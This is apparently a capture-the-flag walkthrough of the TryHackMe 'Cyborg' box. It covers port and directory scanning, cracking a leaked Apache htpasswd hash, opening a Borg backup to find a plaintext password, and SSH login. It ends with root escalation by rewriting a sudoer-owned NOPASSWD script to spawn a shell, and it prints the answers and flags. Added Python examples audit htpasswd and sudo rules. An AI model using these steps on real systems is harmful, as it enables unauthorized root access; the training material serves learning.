TryHackMe-Cyborg

From aldeid

Cyborg

A box involving encrypted archives, source code analysis and more.

Compromise the machine and read the user.txt and root.txt

Scan the machine, how many ports are open?

Let’s start by scanning the machine with Nmap to identify the running services. There are 2 services exposed:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Answer: 2

What service is running on port 22?

Answer: SSH

What service is running on port 80?

Answer: HTTP

What is the user.txt flag?

Web enumeration

Gobuster reveals 2 interesting hidden locations:

[email protected]:/data/Cyborg$ gobuster dir -u http://10.10.61.219 -x php,txt,old,bak,zip,tar -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.61.219
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,old,bak,zip,tar
[+] Timeout:        10s
===============================================================
2021/04/29 11:21:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.zip (Status: 403)
/.hta.tar (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.hta.old (Status: 403)
/.hta.bak (Status: 403)
/.htaccess (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301) <------------------ interesting
/etc (Status: 301) <-------------------- interesting
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2021/04/29 11:25:42 Finished
===============================================================

The etc directory

The /etc directory contains a squid subdirectory, with an interesting passwd file:

[email protected]:/data/Cyborg/files$ curl -s http://10.10.61.219/etc/squid/ | html2text 
****** Index of /etc/squid ******
[[ICO]]       Name             Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                    -  
[[   ]]       passwd           2020-12-30 02:09   52  
[[   ]]       squid.conf       2020-12-30 02:09  258  
===========================================================================
     Apache/2.4.18 (Ubuntu) Server at 10.10.61.219 Port 80

The passwd file contains an htpasswd-style entry for the music_archive user, with the password stored as an $apr1$ (Apache MD5) hash:

[email protected]:/data/Cyborg/files$ curl -s http://10.10.61.219/etc/squid/passwd
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

Let’s crack the hash:

[email protected]:/data/Cyborg/files$ /data/src/john/run/john passwd.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)
1g 0:00:00:00 DONE (2021-04-29 11:43) 3.846g/s 149907p/s 149907c/s 149907C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We have found credentials: music_archive:squidward.
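The $apr1$ scheme John just cracked is Apache's md5crypt variant: a salted, 1000-round MD5 construction with no memory cost, which is why a wordlist run finishes in under a second. The following is an added example, not part of the original write-up, implementing the scheme with only hashlib so the entry from the page can be verified and an htpasswd file can be audited against a list of known-weak passwords. The wordlist and the audit_htpasswd helper are constructed for this example; the hash value is the one published above.

```python
import hashlib
import hmac

# The hash taken from the page's /etc/squid/passwd listing.
PAGE_HASH = "$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn."

# crypt(3)-style alphabet used by md5crypt/apr1 for its output encoding.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """Emit `count` 6-bit groups of `value`, least significant group first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: bytes, salt: bytes, magic: bytes = b"$apr1$") -> str:
    """Compute an Apache APR1 hash (md5crypt with the $apr1$ magic)."""
    salt = salt[:8]  # md5crypt uses at most 8 salt characters
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    plen = len(password)
    while plen > 0:  # feed len(password) bytes of the alternate digest
        ctx.update(alt[: min(16, plen)])
        plen -= 16
    i = len(password)
    while i:  # the original "something really weird" step
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for rnd in range(1000):  # fixed stretching loop, no memory hardness
        c = hashlib.md5()
        c.update(password if rnd & 1 else final)
        if rnd % 3:
            c.update(salt)
        if rnd % 7:
            c.update(password)
        c.update(final if rnd & 1 else password)
        final = c.digest()
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order
    )
    encoded += _to64(final[11], 2)
    return (magic + salt).decode() + "$" + encoded


def verify_apr1(candidate: str, stored: str) -> bool:
    """Check a candidate password against a stored $apr1$ hash."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ hash")
    computed = apr1_md5(candidate.encode(), parts[2].encode())
    return hmac.compare_digest(computed, stored)


def audit_htpasswd(lines, wordlist):
    """Return {user: password} for each $apr1$ entry matching a word in the list."""
    weak = {}
    for line in lines:
        line = line.strip()
        if ":" not in line:
            continue
        user, stored = line.split(":", 1)
        if not stored.startswith("$apr1$"):
            continue
        for word in wordlist:
            if verify_apr1(word, stored):
                weak[user] = word
                break
    return weak


if __name__ == "__main__":
    # Constructed sample: the page's entry and a tiny wordlist.
    sample = ["music_archive:" + PAGE_HASH]
    print(audit_htpasswd(sample, ["password", "123456", "squidward"]))
```

The takeaway for a defender is twofold: a proxy-auth file like this must never sit under the web root, and even behind the web root, $apr1$ gives a leaked entry almost no protection against a dictionary attack; bcrypt (htpasswd -B) is the option to use.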

The admin directory

The other hidden location (/admin) is a website about music. Browsing through its menus, you will find an entry to download an archive. Unpacking it yields files that look encrypted or otherwise unreadable:

[email protected]:/data/Cyborg/files$ wget http://10.10.61.219/admin/archive.tar
[email protected]:/data/Cyborg/files$ tar xf archive.tar 
[email protected]:/data/Cyborg/files$ tree home/
home/
└── field
    └── dev
        └── final_archive
            ├── config
            ├── data
            │   └── 0
            │       ├── 1
            │       ├── 3
            │       ├── 4
            │       └── 5
            ├── hints.5
            ├── index.5
            ├── integrity.5
            ├── nonce
            └── README

5 directories, 10 files

The README file is the key, as it explains what this archive is: a BorgBackup repository.

[email protected]:/data/Cyborg/files/home/field/dev/final_archive$ cat README 
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

The BorgBackup archive

To know more about BorgBackup and available commands, use the official documentation.

List all archives in the repository. When prompted for the passphrase, use the password cracked from the squid passwd file:

[email protected]:/data/Cyborg/files/home/field/dev$ borg list final_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 15:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]

List the contents of the music_archive archive:

[email protected]:/data/Cyborg/files/home/field/dev$ borg list final_archive::music_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: 
drwxr-xr-x alex   alex          0 Tue, 2020-12-29 14:55:52 home/alex
-rw-r--r-- alex   alex       3637 Mon, 2020-12-28 15:25:14 home/alex/.bashrc
-rw-r--r-- alex   alex        220 Mon, 2020-12-28 15:25:14 home/alex/.bash_logout
-rw-r--r-- alex   alex        675 Mon, 2020-12-28 15:25:14 home/alex/.profile
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:00:24 home/alex/Music
-rw------- alex   alex        439 Mon, 2020-12-28 18:26:45 home/alex/.bash_history

[REDACTED]

drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/sublime-text-3/Installed Packages
drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/ibus
drwx------ root   root          0 Mon, 2020-12-28 17:33:49 home/alex/.config/ibus/bus
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 14:55:52 home/alex/Documents
-rw-r--r-- root   root        110 Tue, 2020-12-29 14:55:41 home/alex/Documents/note.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:30 home/alex/Public
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:37 home/alex/Videos
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 14:57:14 home/alex/Desktop
-rw-r--r-- root   root         71 Tue, 2020-12-29 14:57:14 home/alex/Desktop/secret.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:59:57 home/alex/Downloads
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:00:02 home/alex/Templates
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 19:26:44 home/alex/Pictures

Restore the music_archive archive by extracting the files relative to the current directory:

[email protected]:/data/Cyborg/files/home/field/dev$ borg extract final_archive::music_archive
Enter passphrase for key /data/Cyborg/files/home/field/dev/final_archive: 
[email protected]:/data/Cyborg/files/home/field/dev$ tree home/
home/
└── alex
    ├── Desktop
    │   └── secret.txt
    ├── Documents
    │   └── note.txt
    ├── Downloads
    ├── Music
    ├── Pictures
    ├── Public
    ├── Templates
    └── Videos

9 directories, 2 files

Connect as alex and get the user flag

There are 2 interesting documents in the recovered archive, one of them revealing alex’s credentials:

[email protected]:/data/Cyborg/files/home/field/dev$ cat home/alex/Desktop/secret.txt 
shoutout to all the people who have gotten to this stage whoop whoop!"
[email protected]:/data/Cyborg/files/home/field/dev$ cat home/alex/Documents/note.txt 
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:[email protected]

Now connect with SSH and get the flag:

[email protected]:/data/Cyborg/files$ ssh [email protected]
[email protected]:~$ cat user.txt 
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

What is the root.txt flag?

Checking alex’s privileges with sudo -l reveals that we can run a backup.sh script as root, without a password:

[email protected]:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

We own the script, but it is not writable (mode r-xr-xr--). Since the owner of a file may change its permissions, this is only a minor obstacle:

[email protected]:~$ ls -l /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 01:48 /etc/mp3backups/backup.sh
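The misconfiguration here is not the missing write bit but the ownership: a NOPASSWD rule pointing at a file the sudoer owns (or can write, or whose parent directory they can write) lets that user decide what root executes. The script below is an added example, not part of the original write-up, that parses sudo -l output and checks each target path for exactly those conditions. The sudo -l text is a constructed sample modelled on the listing above, and demo() recreates the page's situation with a temporary script owned by the current user and mode r-xr-xr--.

```python
import os
import re
import stat
import tempfile

# Constructed sample of `sudo -l` output modelled on the page; demo() fills in
# the {script} placeholder with a temporary file.
SUDO_L_TEMPLATE = """Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: {script}
"""

# "(runas) TAG: TAG: /path args" -> groups: runas, tags, command list
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(\S.*)$")


def parse_sudo_targets(sudo_l_text: str):
    """Yield (runas, tags, command_path) for each command rule in sudo -l output."""
    in_rules = False
    for line in sudo_l_text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        for cmd in cmds.split(", "):
            yield runas.strip(), tags.strip(), cmd.split()[0]


def _writable_by(st, uid: int, gids: set) -> bool:
    """True if a user with uid/gids can write the object described by `st`."""
    if st.st_mode & stat.S_IWOTH:
        return True
    if st.st_mode & stat.S_IWGRP and st.st_gid in gids:
        return True
    return bool(st.st_mode & stat.S_IWUSR) and st.st_uid == uid


def audit_target(path: str, uid: int, gids: set) -> list:
    """List the reasons the invoking user could alter what this sudo rule runs."""
    reasons = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        reasons.append("target-missing")  # sudo will fail, but the path could be created
        st = None
    if st is not None:
        if st.st_uid == uid:
            reasons.append("owned-by-invoking-user")  # owner can chmod +w and rewrite it
        if _writable_by(st, uid, gids):
            reasons.append("writable-by-invoking-user")
    try:
        parent = os.stat(os.path.dirname(path) or "/")
        if parent.st_uid == uid or _writable_by(parent, uid, gids):
            reasons.append("parent-directory-writable")  # file can be replaced wholesale
    except FileNotFoundError:
        pass
    return reasons


def audit_sudo_rules(sudo_l_text: str, uid=None, gids=None) -> list:
    """Return (path, runas, tags, reasons) for every rule whose target is at risk."""
    uid = os.geteuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else gids
    findings = []
    for runas, tags, path in parse_sudo_targets(sudo_l_text):
        reasons = audit_target(path, uid, gids)
        if reasons:
            findings.append((path, runas, tags, reasons))
    return findings


def demo() -> list:
    """Recreate the page's situation: a NOPASSWD script owned by the sudoer, mode 0554."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "backup.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\necho backing up mp3s\n")
        os.chmod(script, 0o554)  # r-xr-xr--, as in the ls -l output above
        return audit_sudo_rules(SUDO_L_TEMPLATE.format(script=script))


if __name__ == "__main__":
    for path, runas, tags, reasons in demo():
        print(f"{path} ({runas}, {tags}): {', '.join(reasons)}")
```

The fix on the box side is the usual one: sudo targets must be owned by root, writable only by root, and live in a root-owned directory; a cron or CI check running audit_sudo_rules over each user's sudo -l output catches the regression before someone else does.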

Let’s make the script writable and replace its content with a command that spawns a shell. As the script runs with root privileges, the shell we get is a root shell.

[email protected]:/etc/mp3backups$ chmod +w backup.sh 
[email protected]:/etc/mp3backups$ cat > backup.sh << EOF
> #!/bin/bash
> /bin/bash
> EOF
[email protected]:/etc/mp3backups$ sudo /etc/mp3backups/backup.sh
[email protected]:/etc/mp3backups# cd /root
[email protected]:/root# cat root.txt 
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}

Root flag: flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}